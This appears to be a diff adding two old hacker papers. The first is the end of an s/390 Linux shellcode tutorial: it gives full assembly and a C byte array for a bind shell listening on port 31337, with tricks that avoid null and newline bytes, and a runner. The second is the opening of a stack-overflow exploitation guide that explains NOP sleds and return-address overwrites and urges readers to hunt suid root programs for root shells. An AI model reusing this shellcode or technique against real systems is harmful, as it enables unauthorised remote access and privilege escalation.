+        ar0-ar15 are normally not used by programs, but good for 
+        temporary storage
+        
+Floating point registers        :
+        fp0-fp15 are IEEE and HFP floating ( Linux only uses IEEE )
+        
+PSW ( Programm Status Word )        :
+        is the most important register and serves the roles of a program
+        counter, memory space designator and condition code register.
+        For those who wanna know more about this register, should take
+        a closer look on the references at the bottom.
+        
+
+
+        
+----[ 2.2 - Instruction set
+
+Next I'll show you some useful instructions we will need, while developing
+our shellcode.
+
+
+Instruction                        Example
+---------------------------------------------------------------------------
+basr (branch and save)        %r1,0               # save value 0 to %r1
+lhi  (load h/word immediate)  lhi %r4,2           # load value 2 into %r4
+la   (load address)           la %r3,120(%r15)    # load address from
+                                                  # %r15+120 into %r3
+lr   (load register)          lr %r4,%r9          # load value from %r9
+                                                  # into %r4
+stc  (store character)        stc %r6,120(%r15)   # store 1 character from
+                                                  # %r6 to %r15+120
+sth  (store halfword)         sth %r3,122(%r15)   # store 2 bytes from
+                                                  # %r3 to %r15+122
+ar   (add)                    ar %r6,%r10         # add value in %r10 ->%r6
+xr   (exclusive or)           xr %r2,%r2          # 0x00 trick :)
+svc  (service call)           svc 1               # exit
+
+
+
+
+----[ 2.3 - Syscalls
+
+    On Linux for s/390 or zSeries syscalls are done by using the
+instruction SVC with it's opcode 0x0a ! This is no good message for
+shellcoders, coz 0x0a is a special character in a lot of services. But
+before i start explaining how we can avoid using this call let's have a
+look on how our OS is using the syscalls.
+
+    The first four parameters of a syscall are delivered to the registers
+%r2-%r5 and the resultcode can be found in %r2 after the SVC call.
+
+Example of an execve call:
+
+        basr	  %r1,0
+base:
+        la        %r2,exec-base(%r1)
+        la        %r3,arg-base(%r1)
+        la        %r4,tonull-base(%r1)
+        svc     11
+
+exec:
+        .string  "/bin//sh"
+arg:        
+        .long   exec 
+tonull:
+        .long   0x0
+        
+
+    A special case is the SVC call 102 (SYS_SOCKET). First we have to feed
+the register %r2 with the desired function ( socket, bind, listen, accept, 
+....) and %r3 points to a list of parameters this function needs. Every
+parameter in this list has its own u_long value.
+
+And again an example of a socket() call :
+
+        lhi        %r2,2                # domain
+        lhi        %r3,1                # type
+        xr         %r4,%r4              # protocol
+        stm        %r2,%r4,128(%r15)    # store %r2 - %r4
+        lhi        %r2,1                # function socket()
+        la         %r3,128(%r15)        # pointer to the API values
+        svc        102                  # SOCKETCALL
+        lr         %r7,%r2              # save filedescriptor to %r7
+
+        
+
+
+        
+----[ 2.4 - The native code
+
+So now, here is a sample of a complete portbindshell in native style :
+
+        .globl _start
+        
+_start:
+        basr       %r1,0                     # our base-address
+base:
+
+        lhi        %r2,2                     # AF_INET
+        sth        %r2,120(%r15)
+        lhi        %r3,31337                 # port
+        sth        %r3,122(%r15)
+        xr         %r4,%r4                   # INADDR_ANY
+        st         %r4,124(%r15)             # 120-127 is struct sockaddr *
+        lhi        %r3,1                     # SOCK_STREAM
+        stm        %r2,%r4,128(%r15)         # store %r2-%r4, our API values
+        lhi        %r2,1                     # SOCKET_socket
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL 
+        lr         %r7,%r2                   # save socket fd to %r7
+        la         %r3,120(%r15)             # pointer to struct sockaddr *
+        lhi        %r9,16                    # save value 16 to %r9
+        lr         %r4,%r9                   # sizeof address
+        stm        %r2,%r4,128(%r15)         # store %r2-%r4, our API values
+        lhi        %r2,2                     # SOCKET_bind
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL
+        lr         %r2,%r7                   # get saved socket fd
+        lhi        %r3,1                     # MAXNUMBER
+        stm        %r2,%r3,128(%r15)         # store %r2-%r3, our API values
+        lhi        %r2,4                     # SOCKET_listen
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL
+        lr         %r2,%r7                   # get saved socket fd
+        la         %r3,120(%r15)             # pointer to struct sockaddr *
+        stm        %r2,%r3,128(%r15)         # store %r2-%r3,our API values
+        st         %r9,136(%r15)             # %r9 = 16, this case: fromlen
+        lhi        %r2,5                     # SOCKET_accept
+        la         %r3,128(%r15)             # pointer to the API values
+        svc        102                       # SOCKETCALL
+        xr         %r3,%r3                   # the following shit
+        svc        63                        # duplicates stdin, stdout
+        ahi        %r3,1                     # stderr
+        svc        63                        # DUP2
+        ahi        %r3,1                        
+        svc        63                        
+        la         %r2,exec-base(%r1)        # point to /bin/sh
+        la         %r3,arg-base(%r1)         # points to address of /bin/sh
+        la         %r4,tonull-base(%r1)      # point to envp value
+        svc        11                        # execve
+        slr        %r2,%r2                        
+        svc        1                         # exit
+        
+exec:
+        .string  "/bin//sh"
+arg:
+        .long   exec
+tonull:
+        .long   0x0                
+
+
+
+
+----[ 2.5 - Avoiding 0x00 and 0x0a
+
+    To get a clean working shellcode we have two things to bypass. First
+avoiding 0x00 and second avoiding 0x0a.
+
+Here is our first case :
+
+a7 28 00 02             lhi     %r2,02
+
+And here is my solution :
+
+a7 a8 fb b4             lhi     %r10,-1100
+a7 28 04 4e             lhi     %r2,1102
+1a 2a                   ar      %r2,%r10
+
+    I statically define a value -1100 in %r10 to use it multiple times.
+After that i load my wanted value plus 1100 and in the next instruction
+the subtraction of 1102-1100 gives me the real value. Quite easy.
+
+To get around the next problem we have to use selfmodifing code:
+
+svc:
+        .long 0x0b6607fe          <---- will be svc 66, br %r14 after
+                                        code modification
+
+    Look at the first byte, it has the value 0x0b at the moment. The
+following code changes this value to 0x0a:
+
+basr      %r1,0                   # our base-address
+la        %r9,svc-base(%r1)       # load address of svc subroutine
+lhi       %r6,1110                # selfmodifing
+lhi       %r10,-1100              # code is used 
+ar        %r6,%r10                # 1110 - 1100 = \x0a opcode SVC
+stc       %r6,svc-base(%r1)       # store svc opcode
+
+Finally the modified code looks as follows :
+
+0a 66                svc 66
+07 fe                br %r14
+
+To branch to this subroutine we use the following command :
+
+basr        	     %r14,%r9     # branch to subroutine SVC 102
+
+    The Register %r9 has the address of the subroutine and %r14 contains
+the address where to jump back.
+
+
+
+
+----[ 2.6 - The final code
+
+Finally we made it, our shellcode is ready for a first test:
+
+        .globl _start
+        
+_start:
+        basr      %r1,0                   # our base-address
+base:
+        la        %r9,svc-base(%r1)       # load address of svc subroutine
+        lhi       %r6,1110                # selfmodifing
+        lhi       %r10,-1100              # code is used 
+        ar        %r6,%r10                # 1110 - 1100 = \x0a opcode SVC
+        stc       %r6,svc-base(%r1)       # store svc opcode 
+        lhi       %r2,1102                # portbind code always uses
+        ar        %r2,%r10                # real value-1100 (here AF_INET)
+        sth       %r2,120(%r15)
+        lhi       %r3,31337               # port
+        sth       %r3,122(%r15)
+        xr        %r4,%r4                 # INADDR_ANY
+        st        %r4,124(%r15)           # 120-127 is struct sockaddr *
+        lhi       %r3,1101                # SOCK_STREAM
+        ar        %r3,%r10
+        stm       %r2,%r4,128(%r15)       # store %r2-%r4, our API values
+        lhi       %r2,1101                # SOCKET_socket
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lr        %r7,%r2                 # save socket fd to %r7
+        la        %r3,120(%r15)           # pointer to struct sockaddr *
+        lhi       %r8,1116                
+        ar        %r8,%r10                # value 16 is stored in %r8
+        lr        %r4,%r8                 # size of address
+        stm       %r2,%r4,128(%r15)       # store %r2-%r4, our API values
+        lhi       %r2,1102                # SOCKET_bind
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lr        %r2,%r7                 # get saved socket fd
+        lhi       %r3,1101                # MAXNUMBER
+        ar        %r3,%r10
+        stm       %r2,%r3,128(%r15)       # store %r2-%r3, our API values
+        lhi       %r2,1104                # SOCKET_listen
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lr        %r2,%r7                 # get saved socket fd
+        la        %r3,120(%r15)           # pointer to struct sockaddr *
+        stm       %r2,%r3,128(%r15)       # store %r2-%r3, our API values
+        st        %r8,136(%r15)           # %r8 = 16, in this case fromlen
+        lhi       %r2,1105                # SOCKET_accept
+        ar        %r2,%r10
+        la        %r3,128(%r15)           # pointer to the API values
+        basr      %r14,%r9                # branch to subroutine SVC 102
+        lhi       %r6,1163                # initiate SVC 63 = DUP2
+        ar        %r6,%r10
+        stc       %r6,svc+1-base(%r1)        # modify subroutine to SVC 63
+        lhi       %r3,1102                # the following shit
+        ar        %r3,%r10                # duplicates
+        basr      %r14,%r9                # stdin, stdout
+        ahi       %r3,-1                        # stderr
+        basr      %r14,%r9                # SVC 63 = DUP2
+        ahi       %r3,-1
+        basr      %r14,%r9
+        lhi       %r6,1111                # initiate SVC 11 = execve
+        ar        %r6,%r10
+        stc       %r6,svc+1-base(%r1)     # modify subroutine to SVC 11
+        la        %r2,exec-base(%r1)      # point to /bin/sh
+        st        %r2,exec+8-base(%r1)    # save address to /bin/sh
+        la        %r3,exec+8-base(%r1)    # points to address of /bin/sh
+        xr        %r4,%r4                 # 0x00 is envp
+        stc       %r4,exec+7-base(%r1)    # fix last byte /bin/sh\\ to 0x00
+        st        %r4,exec+12-base(%r1)   # store 0x00 value for envp
+        la        %r4,exec+12-base(%r1)   # point to envp value
+        basr      %r14,%r9                # branch to subroutine SVC 11
+svc:
+        .long 0x0b6607fe                  # our subroutine SVC n + br %r14
+exec:
+        .string  "/bin/sh\\"
+        
+
+In a C-code environment it looks like this :
+
+char shellcode[]=
+"\x0d\x10"		/* basr    %r1,%r0				*/
+"\x41\x90\x10\xd4"	/* la      %r9,212(%r1)				*/
+"\xa7\x68\x04\x56"	/* lhi     %r6,1110				*/
+"\xa7\xa8\xfb\xb4"	/* lhi     %r10,-1100				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd4"	/* stc     %r6,212(%r1)				*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x40\x20\xf0\x78"	/* sth     %r2,120(%r15)			*/
+"\xa7\x38\x7a\x69"	/* lhi     %r3,31337				*/
+"\x40\x30\xf0\x7a"	/* sth     %r3,122(%r15)			*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x50\x40\xf0\x7c"	/* st      %r4,124(%r15)			*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4d"	/* lhi     %r2,1101				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x72"		/* lr      %r7,%r2				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\xa7\x88\x04\x5c"	/* lhi     %r8,1116				*/
+"\x1a\x8a"		/* ar      %r8,%r10				*/
+"\x18\x48"		/* lr      %r4,%r8				*/
+"\x90\x24\xf0\x80"	/* stm     %r2,%r4,128(%r15)			*/
+"\xa7\x28\x04\x4e"	/* lhi     %r2,1102				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\xa7\x38\x04\x4d"	/* lhi     %r3,1101				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\xa7\x28\x04\x50"	/* lhi     %r2,1104				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x18\x27"		/* lr      %r2,%r7				*/
+"\x41\x30\xf0\x78"	/* la      %r3,120(%r15)			*/
+"\x90\x23\xf0\x80"	/* stm     %r2,%r3,128(%r15)			*/
+"\x50\x80\xf0\x88"	/* st      %r8,136(%r15)			*/
+"\xa7\x28\x04\x51"	/* lhi     %r2,1105				*/
+"\x1a\x2a"		/* ar      %r2,%r10				*/
+"\x41\x30\xf0\x80"	/* la      %r3,128(%r15)			*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x8b"	/* lhi     %r6,1163				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\xa7\x38\x04\x4e"	/* lhi     %r3,1102				*/
+"\x1a\x3a"		/* ar      %r3,%r10				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x3a\xff\xff"	/* ahi     %r3,-1				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\xa7\x68\x04\x57"	/* lhi     %r6,1111				*/
+"\x1a\x6a"		/* ar      %r6,%r10				*/
+"\x42\x60\x10\xd5"	/* stc     %r6,213(%r1)				*/
+"\x41\x20\x10\xd8"	/* la      %r2,216(%r1)				*/
+"\x50\x20\x10\xe0"	/* st      %r2,224(%r1)				*/
+"\x41\x30\x10\xe0"	/* la      %r3,224(%r1)				*/
+"\x17\x44"		/* xr      %r4,%r4				*/
+"\x42\x40\x10\xdf"	/* stc     %r4,223(%r1)				*/
+"\x50\x40\x10\xe4"	/* st      %r4,228(%r1)				*/
+"\x41\x40\x10\xe4"	/* la      %r4,228(%r1)				*/
+"\x0d\xe9"		/* basr    %r14,%r9				*/
+"\x0b\x66"		/* svc	   102 		<--- after modification	*/
+"\x07\xfe"		/* br      %r14					*/
+"\x2f\x62\x69\x6e"	/* /bin						*/
+"\x2f\x73\x68\x5c";	/* /sh\						*/
+
+main()
+{
+ void (*z)()=(void*)shellcode;
+ z();
+}
+
+
+
+
+--[ 3 - References:
+
+
+[1] z/Architecture Principles of Operation (SA22-7832-00) 
+    http://publibz.boulder.ibm.com/epubs/pdf/dz9zr000.pdf
+
+[2] Linux for S/390 ( SG24-4987-00 )
+    http://www.redbooks.ibm.com/pubs/pdfs/redbooks/sg244987.pdf
+
+[3] LINUX for S/390 ELF Application Binary Interface Supplement
+    http://oss.software.ibm.com/linux390/docu/l390abi0.pdf
+
+[4] Example exploits
+    http://www.thc.org/misc/sploits/
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: GnuPG v1.0.6 (GNU/Linux)
+Comment: Weitere Infos: siehe http://www.gnupg.org
+
+mQGiBDzw5yMRBACGJ1o25Bfbb6mBkP2+qwd0eCTvCmC5uJGdXWOW8BbQwDHkoO4h
+sdouA+0JdlTFIQriCZhZWbspNsWEpXPOAW8vG3fSqIUqiDe6Aj21h+BnW0WEqx9t
+8TkooEVS3SL34wiDCig3cQtmvAIj0C9g4pj5B/QwHJYrWNFoAxc2SW1lXwCg8Wk9
+LawvHW+Xqnc6n/w5Oo8IpNsD/2Lp4fvQFiTvN22Jd63nCQ75A64fB7mH7ZUsVPYy
+BctYXM4GhcHx7zfOhAbJQNWoNmYGiftVr9UvO9GSnG+Y9jq6I16qOn7T7dIZUEpL
+F5FevEFTyrtDGYmBhGv9hwtbz3CI9n9gpZxz1xYTbDHxkVIiTMlcNR3GIJRPfo5B
+a7u4A/9ncKqRx2HbRkaj39zugC6Y28z9lSimGzu7PTVw3bxDbObgi4CyHcjnHe+j
+DResuKGgdyEf+d07ofbFEOdQjgaDx1mmswS4pcILKOyRdQMtdbgSdyPlJw5KGHLX
+G0hrHV/Uhgok3W6nC43ZvPWbd3HVfOIU8jDTRgWaRDjGc45dtbQkam9obm55IGN5
+YmVycHVuayA8am9obmN5YnBrQGdteC5uZXQ+iFcEExECABcFAjzw5yMFCwcKAwQD
+FQMCAxYCAQIXgAAKCRD3c5EGutq/jMW7AJ9OSmrB+0vMgPfVOT4edV7C++RNHwCf
+byT/qKeSawxasF8g4HeX33fSPe25Ag0EPPDnrRAIALdcTn8E2Z8Z4Ua4p8fjwXNO
+iP6GOANUN5XLpmscv9v5ErPfK+NM2ARb7O7rQJfLkmKV8voPNj4lPUUyltGeOhzj
+t86I5p68RRSvO5JKTW+riZamaD8lB84YqLzmt9OuzuOeAJCq3GuQtPMyrNuOkPL9
+nX51EgnLnYaUYAkysAhYLhlrye/3maNdjtn2T63MoJauAoB4TpKvegsGsf1pA5mj
+y9fuG6zGnWt8XpVSdD2W3PUJB+Q7J3On35byebIKiuGsti6Y5L0ZSDlW2rveZp9g
+eRSQz06j+mxAooTUMBBJwMmXjHm5nTgr5OX/8mpb+I73MGhtssRr+JW+EWSLQN8A
+AwcH/iqRCMmPB/yiMhFrEPUMNBsZOJ+VK3PnUNLbAPtHz7E2ZmEpTgdvLR3tjHTC
+vZO6k40H1BkodmdFkCHEwzhWwe8P3a+wgW2LnPCM6tfPEfp9kPXD43UlTLWLL4RF
+cPmyrs45B2uht7aE3Pe0SgbsnWAej87Stwb+ezOmngmrRvZKnYREVR1RHRRsH3l6
+C4rexD3uHjFNdEXieW97xHG71YpOVDX6slCK2SumfxzQAEZC2n7/DqwPd6Z/abAf
+Ay9WmTpqBFd2FApUtZ1h8cpS6MYb6A5R2BDJQl1hN2pQFNzIh8chjVdQc67dKiay
+R/g0Epg0thiVAecaloCJlJE8b3OIRgQYEQIABgUCPPDnrQAKCRD3c5EGutq/jNuP
+AJ979IDls926vsxlhRA5Y8G0hLyDAwCgo8eWQWI7Y+QVfwBG8XCzei4oAiI=
+=2B7h
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+|=[ EOF ]=---------------------------------------------------------------=|

Papers/overflow.txt

@@ -0,0 +1,713 @@
+-------------------------------------------------------------------------------
+ øSTACK OVERFLOW EXPLOiTS ON LiNUX/BSDOS/FREEBSD/SUNOS/SOLARiS/HP-UXø
+-------------------------------------------------------------------------------
+
+ øintroductionø
+ ~~~~~~~~~~~~
+ welcome to the world of stack overflows, actually i planned an article
+ explaining the complete operation of stack overflows on pc based unix
+ systems, but as i read the new phrack magazine issue #49 i realized that
+ somebody else had already written this article. well, if you want to learn
+ more about the backgrounds (assembler programming/debugging) of stack
+ overflows on linux systems and want to read an excellent article get the
+ latest phrack magazine issue #49, article 14 by aleph one, the most com-
+ plete article i have ever seen, great job! (phrack49.zip)
+ but if you are not interested in understanding hundreds of lines pure
+ i80386 (disassembled) assembler code and want to have a more practical
+ guide, continue reading this article in order to easily learn how to use
+ overflow exploits on various unix systems.
+
+
+ øcontentsø
+ ~~~~~~~~
+                  [øaø]    øthe stack - small backgroundø
+                  [øbø]    østructure of the stackø
+                  [øcø]    øabusing the return adressø
+                  [ødø]    øexecuting a shell in assemblerø
+                  [øeø]    øgetting the real stack adressø
+                  [øfø]    øenvironment/command line variablesø
+                  [øgø]    øclosing wordsø
+
+           exploit[ø1ø]    ømount.c  - linux version: < 2.0.8ø
+           exploit[ø2ø]    ørdist.c  - all bsd version: 2.0ø
+           exploit[ø3ø]    ørlogin.c - solaris version: 2.5 & 2.5.1ø
+
+          appendix[øAø]    øasm and c code for executionø
+          appendix[øBø]    ønop commands for different systemsø
+          appendix[øCø]    øget_sp() for different systemsø
+          appendix[øDø]    øfindsuid.sh - shellscriptø
+
+
+ [øaø] øthe stack - small backgroundø
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ the main function of every CPU is processing and moving of data. while
+ processing or moving the CPU needs a place to fast save important
+ information due the limited space of the registers. these information
+ are saved to the stack. the stack is a special part of the memory that
+ can be accessed with special and very fast commands. the stack is variable
+ in length and position.
+
+ e.g. if a register N is used and a sub-procedure is executed that also
+      uses the register N the CPU will save the value of the register N
+      onto the stack and restore it after the procedure has terminated. in
+      order to improve the speed of this process, the CPU uses the special
+      stack commands that are faster than normal movings in memory.
+ e.g. if a procedure is executed the CPU needs to know where to return to
+      if the procedure is terminated, the return adress is saved on the
+      stack before executing the procedure and after terminatig the proce-
+      dure the CPU jumps to the return adress stored on the stack.
+
+ there is a second function of the stack. if a program creates or receives
+ data, the new data field will be stored in the memory, all programs use
+ dynamic data fields to store such information. the CPU creates such fields
+ on the stack if they are needed and removes them if they are not needed
+ anymore, local variables or arrays are dynamic.
+
+ e.g. if a procedure should exchange two variables (a <-> b), it needs a
+      third variable c to store one value:       c <- a
+                                                 a <- b
+                                                 b <- c
+      the variable c would be installed on the stack and removed after the
+      procedure has terminated.
+
+ for sure you now remember my introducing words promising something like
+ "easily creating exploits without learning all the shit behind". well,
+ i'm sorry but you have to know some of the backgrounds, and i try to
+ explain these as simple as possible. (i could have explained everything
+ in assembler code ;]
+
+
+ [øbø] øthe structure of the stackø
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ the stack is structured in a way that confuses some people sometimes (like
+ me), the first stored value will be read as last and the last stored value
+ will be read as first, this system is called "last in, first out" or LIFO.
+ now let's take a closer look at the stack, imagine we have just executed
+ a procedure in a program (just to keep your interest: we will later do
+ this to gain r00t privileges). how does the stack look like if the
+ procedure needs some own local (dynamic) variables?
+                          .
+                          .
+                          :   ...                 .  .
+                          |-----------------------:
+             -2048 bytes  |   local array1[1024]  |  ...
+                          |-----------------------|
+             -1024 bytes  |   local array2[1024]  |  size 1024 bytes
+                          |-----------------------|
+   actual stack position  |   base pointer        |  size 4 bytes
+                          |-----------------------|
+                +4 bytes  |   return adress       |  size 4 bytes
+                          |-----------------------|
+                +4 bytes  :   parameters ...      |  ...
+                          .                       :
+                                                  .  .
+
+ as you see the different mentioned variables and information are stored on
+ the stack. every CPU uses a stack pointer to mark the actual position, it
+ is called SP. the interesting parts of the stack are the local array2 and
+ the return adress, we don't care about the rest because we want to gain
+ r00t access and that is all.
+
+
+ [øcø] øabusing the return adressø
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ as you remember before executing a procedure the CPU saves a return adress
+ onto stack, if the procedure terminates the CPU will jump to the return
+ adress and continue. but if procedure writes more bytes to a local vari-
+ able as its size it will overwrite the return adress and this is called
+ overflow.
+
+ e.g. if (1024+8) 1032 times the character "X" is written to the local
+      array2 in the picture above, the procedure will overwrite its own
+      return adress. and the stack will look like this:
+                          .
+                          .
+                          :   ...                 .  .
+                          |-----------------------:
+             -2048 bytes  |   local array1[1024]  |  ...
+                          |-----------------------|
+             -1024 bytes  |   1024 times "X"      |  size 1024 bytes
+                          |-----------------------|
+   actual stack position  |      4 times "X"      |  size 4 bytes
+                          |-----------------------|
+                +4 bytes  |      4 times "X"      |  size 4 bytes
+                          |-----------------------|
+                +4 bytes  :   parameters ...      |  ...
+                          .                       :
+                                                  .  .
+
+ instead of writing the character "X" onto the return adress, we could
+ write a new adress onto the stack, we would now force the program to jump
+ to where we want!
+ it would be very clever if we jump to an adress where we have placed
+ some own assembler code that will do something interesting (what do you
+ guess?), we could create this assembler code in the local variable; in
+ the example local array2:
+                          .
+                          .
+                          :   ...                 .
+                          |-----------------------:
+             -2048 bytes  |   local array1[1024]  |
+                          |-----------------------|
+             -1024 bytes  |   our code            | < -
+                          |-----------------------|    |
+   actual stack position  |   4 bytes of crap     |    |
+                          |-----------------------|    |
+                +4 bytes  |   adress of our code  | ___|
+                          |-----------------------|
+                +4 bytes  :   parameters ...      |
+                          .                       :
+                                                  .
+
+ if the program is owned by r00t and has the suid flag so that a normal
+ user can execute it and it will give the user r00t privileges as long
+ as it is executed, our code could do something with r00t privilegs!
+ but what?
+
+ [ødø] øexecuting a shell in assemblerø
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ if our code would execute a normal shell and we have created the over-
+ flow in a program with the suid flag and it is owned by the r00t we would
+ have a complete r00t shell and the system would finally be hacked. what
+ we need right now is a short assembler code that will execute a shell,
+ well it is not necessary to execute a shell you can also execute any other
+ program.
+ you can find the corresponding assembler code for the different systems
+ in the appendix [A] in pure assembler and compiled in a c char field
+ called "execshell".
+ if you still want to know how to disassemble such a code read article 14
+ of the phrack magazine #49 or contact me via email. "/bin/sh" has been
+ added to the code in most cases (exceptions: sparc code), if you want to
+ execute a different program just change the char field.
+ in order to guarantee our code to function we copy it and lots of nops in
+ the data field that will later be copied to the local variable. (nop is
+ a shortform of "no operation"). this data field need to be bigger than the
+ local variable in order to overwrite the return adress. in the following
+ example lv_size is the size of the local variable we want to overflow and
+ buffer is the name of the data field (that is also local).
+
+ e.g. #define lv_size=1024
+      char buffer[lv_size+8]
+
+ we add exactly 8 bytes, take a closer look at the stack above and youl
+ will know why. if we want to overwrite the return adress we have to over-
+ write 4 bytes base pointer and 4 bytes return adress.
+ the data field buffer should look like this:
+
+     ...  <nop> <nop> <nop> <nop> <nop> <code executing a shell>
+
+ look at this c code in order to learn how we can do this, lv_size is a
+ shortform of local variable size, execshell is the char field with our
+ assembler code and the path of the shell we want to execute. ptr is a
+ pointer to the field that we will copy over the local variable.
+
+ e.g. the easy version:   for(i=0;i<lv_size-strlen(execshell);i++)
+                           ptr[i]=0x90;
+                          for(i=0;i<strlen(execshell);i++)
+                           ptr[i+lv_size-strlen(execshell)]=execshell[i];
+
+ e.g. the elegant way:    memset(ptr,0x90,lv_size-strlen(execshell));
+                          ptr+=lv_size-strlen(execshell);
+                          for(i=0;i<strlen(execshell);i++)
+                           *(ptr++)=execshell[i];
+
+ these examples are designed for pc based unix system because they use
+ 0x90 which is the code for a nop command, on other platforms you have to
+ use other codes for nops. i have included several codes for nops, take
+ a look at appendix [B].
+ i will use the easy version in my exploits because i'm not a professional
+ c coder and i prefer indexing like it is used in assembler. now we have
+ filled the buffer with our code and some nops and we are finally near our
+ goal, becoming r00t.
+
+ [øeø] øgetting the real stack adressø
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ do you remember that the stack is variable in position and in length?
+ if not, read [b] to fresh up your brain. we use a small function to get
+ the actual stack adress by saving SP, this adress is the beginning of
+ the stack before installing the local variables and the return adress,
+ i will called it old SP (OSP) in the example.
+ we have to add a variable offset to the OSP, this offset has to be that
+ large that the CPU hits a nop when jumping to the return adress.
+                          .
+                          .                       .
+                          :                       .
+                   OSP -> |-----------------------:        ------
+             -2048 bytes  |   local array1[1024]  |              | offset
+                          |-----------------------|              | larger
+             -1024 bytes  |   <...>               |              | than
+                          |   <nop>               |              | 1024
+                          |   <nop>               |        ______|
+                          |   <nop>               | < -   OSP + offset
+                          |   <nop>               |    |
+                          |   <our code>          |    |
+                          |-----------------------|    |
+   actual stack position  |   4 bytes of crap     |    |
+                          |-----------------------|    |
+                +4 bytes  |   adress: OSP+offset  | ___|
+                          |-----------------------|
+                +4 bytes  :   parameters ...      |
+                          .                       :
+                                                  .
+ in the example we have a local variable in front of the manipulated
+ variable, so we have to generate an offset that is larger than the size
+ of this variable.
+ in order to get the SP value, we use a function called get_sp(), of cause
+ there are different methods to get this value on different unix system,
+ i have included several versions in appendix [C]. ptr2 is a long or dword
+ pointer to ptr which points to the return adress in the buffer.
+
+ e.g. the correct code: ptr2=(long *)ptr;
+                        *ptr2=get_sp()+offset;
+
+ e.g. the robust code:  ptr2=(long *)ptr;
+                        for(i=1;i<8;i++)
+                        *(ptr2++)=get_sp()+offset;
+
+ i will use the robust code in my exploits because it writes the return
+ adress 8 times to the stack, if our estimated stack adress is wrong,
+ we have still 7 other places where it could jump to.
+
+ [øfø] øenvironment/command line variablesø
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ you are for sure now tired of all this basic and theoratical stuff, you
+ are right, it is time to find a target and attack it. the program that
+ should be attacked has to be owned by root and has to be set suid. if
+ you want to find some of these programs just use the the findsuid shell
+ in appendix[D].
+ if you have read the upper text parts carefully you now know how to over-
+ flow the stack by using a local variable, but how can i detect that a
+ program is vunerable to the overflow bug? there are two main ways of
+ passing variables to a program the command line and environment variables.
+
+ e.g. command line variable: cat /test.file
+                                 ^ variable (type: char[256])
+
+ after loading the machine code of the program and executing the first
+ procedures the program will copy the command line into a buffer, if there
+ is no size check you can use the command line to overflow the stack, in
+ order to find out the size of the command line variable try some chars on
+ the command line. (e.g. 1024+4, 256+4, 512+4,...) if the program reports
+ "segmentation fault", you can use the program to get r00t access. of cause
+ their exist programs with really huge command line e.g. 8000 bytes. if you
+ have generated a list of suid/root files on your system, just try if there
+ are vunerable on their command line. the second possibilty is to pass the
+ variable by using an environment variable.
+
+ e.g. environment variable:  set TERM=1234
+
+ the program will copy the evironment variable TERM to a buffer, but the
+ size of this buffer can be different, in order to overflow it you need
+ to check sizes like 256, 512, 1024, 2048 and so on. to find out which
+ programs use environment variables is not that easy, of cause you can
+ guess that some programs need to read system information from the en-
+ viroment variables but the best way to find out is to look inside the
+ c source files.
+ In any case try to find out new vulnerable programs, because it is always
+ better to use exploits that are not common and known to the huge crowd of
+ lame exploit abusers.
+
+ [øgø] øclosing wordsø
+ ~~~~~~~~~~~~~~~~~
+ after reading all this timewasting crap you should be able to generate
+ overflow exploits yourself, as a small demonstration i included three
+ sample exploits (which work). I modified the original sources so they've
+ got the same variable names as in the examples so that it should be easy for
+ you to understand the code.
+
+ exploits:           exploit[1]  mount.c  - linux version: < 2.0.8
+                     exploit[2]  rdist.c  - all bsd version: 2.0
+                     exploit[3]  rlogin.c - solaris version: 2.5 & 2.5.1
+
+ you have an undefined feeling in your stomach; if you want to complain
+ about this article, if you want to flame or diss me, if you want to have
+ more information, if you want to swap things or if you just want to leave
+ a useless mail, feel free to contact me via e-mail...
+ PLASMOID@USA.NET and soon on the THC server PLASMOID@INSECURITY.ORG
+ if you are not linked to the internet contact me at the LORE BBS by van
+ hauser/thc. you can also contact me via IRC i'm normally in the channel
